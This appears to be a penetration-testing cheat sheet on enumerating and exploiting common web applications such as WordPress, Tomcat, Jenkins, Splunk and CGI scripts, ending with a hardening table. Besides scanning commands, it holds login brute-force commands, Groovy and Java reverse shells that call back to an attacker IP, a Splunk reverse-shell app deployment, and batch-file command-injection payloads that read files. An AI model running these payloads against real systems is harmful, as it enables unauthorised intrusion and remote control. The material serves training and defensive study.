Common Web Applications

The following sections will detail how to enumerate various web appliations, which could lead to exploitation and access.

EyeWitness

For quick web application discovery.

# https://github.com/RedSiege/EyeWitness
git clone https://github.com/RedSiege/EyeWitness.git && cd EyeWitness/setup

# cmake is already a part of build-essential
sed -i 's/cmake//gI' ./setup.sh
sudo ./setup.sh
cd ..
source eyewitness-venv/bin/activate

# SCAN using nmap XML results output
mkdir ../scan_eyewitness
python Python/EyeWitness.py --web -x ../scan_nmap_disc_all_ports.xml -d ../scan_eyewitness

Wordpress

WPScan is great, but manual enumeration can also uncover more information sometimes (e.g. certain plugins)

/robots.txt

User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/

Sitemap: https://inlanefreight.local/wp-sitemap.xml

Folders

  • /wp-admin
  • /wp-content
    • plugins: often a source of vulnerabilities
    • themes: same
    • scanning for readme.txt under these folders can find hidden resources
  • wp-login.php

Users

  • Administrator: can add and delete users and posts, as well as editing source code
    • leads to RCE!
  • Editor: can publish and manage all posts
  • Author: can publish and manage their own posts
  • Contributor: can write and manage their own posts but not publish
  • Subscriber: can browse posts and edit their profiles

Page Source

curl -so- '<TARGET>/robots.txt'
curl -s <TARGET> | grep -i -e WordPress -e themes -e plugins

WPScan

# Generic enumeration
sudo wpscan -t 20 --api-token <API_TOKEN> --url <TARGET> --enumerate

# Enumerate all plugins
sudo wpscan -t 20 --api-token <API_TOKEN> --url <TARGET> --enumerate ap

# Login brute-force
sudo wpscan -t 20 --url <TARGET> --password-attack xmlrpc -U <USER> -P /usr/share/wordlists/rockyou.txt

Joomla

/robots.txt

...
User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

Page Source

curl -s <TARGET>/README.txt
curl -s <TARGET>/administrator/manifests/files/joomla.xml | xmllint --format -
curl -s <TARGET> | grep -i Joomla

Scanning

pip3 install droopescan 

droopescan scan joomla --url <TARGET>

Drupal

Users:

  • Administrator: has complete control over the Drupal website.
  • Authenticated User: can log in to the website and perform operations such as adding and editing articles based on their permissions.
  • Anonymous: All website visitors are designated as anonymous. By default, these users are only allowed to read posts.

Page Source

curl -s <TARGET> | grep -i Drupal

# Version (older Drupals only)
curl -s <TARGET> | grep -m2 ""

Scanning

pip3 install droopescan

droopescan scan drupal --url <TARGET>

Tomcat

  • webapps/conf/tomcat-users.xml: users and creds for management web server manager
  • webapps/manager/WEB-INF/web.xml: deployment descriptor of the server page routes and classes
  • webapps/manager/WEB-INF/classes/: contains specific logic and probably sensitive information

Apache Jserv and Tomcat

sudo nmap -sV -p 8009,8080 <TARGET>

Page Source

curl -s <TARGET>/invalid | grep Tomcat 
curl -s <TARGET>/docs/ | grep Tomcat

Find Web Manager Pages /manager or host-manager

feroxbuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -u <TARGET>

Brute-Force Web Manager

msfconsole
use auxiliary/scanner/http/tomcat_mgr_login
set rhosts <TARGET>
set VHOST <FQDN>
set RPORT <PORT>
set stop_on_success true
run

Jenkins

Attach Slave Servers and Tomcat

sudo nmap -sV -p 5000,8080 <TARGET>

Script Console

Linux

# Execute System Command
def cmd = '<COMMAND>'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println sout
nc -lvnp <PORT>

# Reverse Shell Callback
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<ATTACKER_IP>/<PORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Windows

nc -lvnp <PORT>

# Reverse Shell Callback
String host="<ATTACKER_IP>";
int port=<PORT>;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Splunk

Weak or null authentication are the most likely vectors

Splunk WebApp

sudo nmap -sV -p 8000,8089 <TARGET>

Uploading Callback Shell

<TARGET>/en-US/app/launcher/home

# Splunk Reverse Shell
git clone https://github.com/0xjpuff/reverse_shell_splunk.git
cd reverse_shell_splunk/reverse_shell_splunk/

# !!! UPDATE !!!
# Change 'attacker_ip_here' and attacker_port_here in the respective script(s)

cd ..
tar -cvzf updater.tar.gz reverse_shell_splunk/

nc -lvnp 8443

# NOTE: uploading the app, causes it run immediately; ensure `nc` is running
# From <TARGET>/en-US/manager/search/apps/local > Install app from file

PRTG Network Monitor

PRTG WebApp

sudo nmap -sV -p 80,443,8080 <TARGET>
curl -s <TARGET> | grep -i Version

osTicket

For some public facing services, one can acquire a valid, internal email by submitting a ticket, though this might require email activation.

Gitlab

CGI

  • Check in:
    • cgi
    • cgi-bin
# Overall (though a bit blunt)
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/LEGACY-SERVICES/CGIs/CGIs.txt -u 'http://<TARGET>/'

# Windows
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x "bat,cmd,exe,vbs,cgi" -u 'http://<TARGET>/cgi/'
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x "bat,cmd,exe,vbs,cgi" -u 'http://<TARGET>/cgi-bin/'

# Linux
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x "sh,cgi,pl,py" -u "http://<TARGET>/cgi/"
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x "sh,cgi,pl,py" -u "http://<TARGET>/cgi-bin/"

NOTE: any command injection might require URL-encoding of the commands though this can be avoided with curl’s option --data-urlencode

# CONFIRM
curl -s --get 'http://<URL>/cgi/welcome.bat' --data-urlencode '& dir'
curl -s --get 'http://<URL>/cgi/welcome.bat' --data-urlencode '& C:\windows\system32\ipconfig.exe'

# File reads ("TACOMAN" is stripped out therefore arbitrary)
curl -s --get 'http://<URL>/cgi/welcome.bat' --data-urlencode '& C:\Windows\System32\find.exe /V "TACOMAN" <FILE>'

Remember certain commands like type or dir are internal DOS commands and do not exist as a .exe file.

ColdFusion

  • on TCP/8500 has the following directories:
    • CFIDE
    • cfdocs

CF Stack

# Mail, HTTP, HTTPS, RPC, Server Monitor, SSL
sudo nmap -sV -p 25,80,443,1935,5500,8500 <TARGET>

IIS

# HTTP, HTTPS, MSSQL, WinRM, WinRM Secure, Alt Port, Alt Port, Web Deploy
sudo nmap -sV -p 80,443,1433,5985,5986,8000,8080,8172 <TARGET>

LDAP

sudo nmap -sV -p 389,636 <TARGET>

Harderning

ApplicationHardening CategoryDiscussion
WordPressSecurity monitoringUse a security plugin such as WordFence which includes security monitoring, blocking of suspicious activity, country blocking, two-factor authentication, and more
JoomlaAccess controlsA plugin such as AdminExile can be used to require a secret key to log in to the Joomla admin page such as http://joomla.inlanefreight.local/administrator?thisismysecretkey
DrupalAccess controlsDisable, hide, or move the admin login page
TomcatAccess controlsLimit access to the Tomcat Manager and Host-Manager applications to only localhost. If these must be exposed externally, enforce IP whitelisting and set a very strong password and non-standard username.
JenkinsAccess controlsConfigure permissions using the Matrix Authorization Strategy plugin
SplunkRegular updatesMake sure to change the default password and ensure that Splunk is properly licensed to enforce authentication
PRTG Network MonitorSecure authenticationMake sure to stay up-to-date and change the default PRTG password
osTicketAccess controlsLimit access from the internet if possible
GitLabSecure authenticationEnforce sign-up restrictions such as requiring admin approval for new sign-ups, configuring allowed and denied domains